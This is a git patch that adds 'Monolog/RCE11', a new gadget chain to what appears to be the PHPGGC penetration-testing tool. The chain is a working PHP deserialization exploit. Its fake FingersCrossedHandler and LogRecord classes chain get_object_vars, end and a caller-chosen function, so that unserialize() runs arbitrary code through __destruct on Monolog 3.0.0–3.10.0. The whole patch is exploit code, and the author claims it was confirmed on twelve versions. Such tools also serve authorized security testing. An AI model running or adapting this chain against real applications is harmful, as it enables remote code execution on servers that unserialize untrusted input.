From 5b1e6055144a50032370702604e313fb017bbd7b Mon Sep 17 00:00:00 2001
From: Alexandros Mitsouli <alexandros.mitsouli@aylo.com>
Date: Sat, 11 Apr 2026 11:27:23 +0300
Subject: [PATCH] Monolog/RCE11: processors-based FunctionCall chain
 (3.0.0-3.10.0+)

---
 gadgetchains/Monolog/RCE/11/chain.php   | 25 +++++++++++++
 gadgetchains/Monolog/RCE/11/gadgets.php | 47 +++++++++++++++++++++++++
 2 files changed, 72 insertions(+)
 create mode 100644 gadgetchains/Monolog/RCE/11/chain.php
 create mode 100644 gadgetchains/Monolog/RCE/11/gadgets.php

diff --git a/gadgetchains/Monolog/RCE/11/chain.php b/gadgetchains/Monolog/RCE/11/chain.php
new file mode 100644
index 00000000..b8e3654e
--- /dev/null
+++ b/gadgetchains/Monolog/RCE/11/chain.php
@@ -0,0 +1,25 @@
+<?php
+
+namespace GadgetChain\Monolog;
+
+require_once __DIR__ . '/gadgets.php';
+
+/**
+ * Monolog 3.x — FingersCrossedHandler + processors (get_object_vars → end → function).
+ * Generic gadget: triggers on unserialize() when Monolog classes are allowed.
+ */
+class RCE11 extends \PHPGGC\GadgetChain\RCE\FunctionCall
+{
+    public static $version = '3.0.0 <= 3.10.0+';
+    public static $vector = '__destruct';
+    public static $author = 'mitsal';
+    public static $information = 'Processors: get_object_vars → end → function(). Sink is user-selectable. Confirmed on PHP 8.4 + Monolog 3.0.0-3.10.0 (12/12 versions)';
+
+    public function generate(array $parameters)
+    {
+        $function = $parameters['function'];
+        $parameter = $parameters['parameter'];
+
+        return new \Monolog\Handler\FingersCrossedHandler($function, $parameter);
+    }
+}
diff --git a/gadgetchains/Monolog/RCE/11/gadgets.php b/gadgetchains/Monolog/RCE/11/gadgets.php
new file mode 100644
index 00000000..7ebfc80d
--- /dev/null
+++ b/gadgetchains/Monolog/RCE/11/gadgets.php
@@ -0,0 +1,47 @@
+<?php
+
+namespace Monolog {
+    enum Level: int
+    {
+        case Debug = 100;
+    }
+
+    class LogRecord
+    {
+        public \DateTimeImmutable $datetime;
+        public string $channel = '';
+        public Level $level;
+        public string $message = '';
+        public array $context = [];
+        public array $extra = [];
+        public mixed $formatted = null;
+
+        public function __construct(mixed $cmd)
+        {
+            $this->datetime = new \DateTimeImmutable();
+            $this->level = \Monolog\Level::Debug;
+            $this->formatted = $cmd;
+        }
+    }
+}
+
+namespace Monolog\Handler {
+    class FingersCrossedHandler
+    {
+        protected \Monolog\Level $passthruLevel;
+        protected $handler;
+        protected bool $buffering = true;
+        protected bool $stopBuffering = false;
+        protected array $buffer;
+        protected array $processors;
+        protected bool $bubble = true;
+
+        public function __construct(string $function, mixed $parameter)
+        {
+            $this->passthruLevel = \Monolog\Level::Debug;
+            $this->handler = $this;
+            $this->buffer = [new \Monolog\LogRecord($parameter)];
+            $this->processors = ['get_object_vars', 'end', $function];
+        }
+    }
+}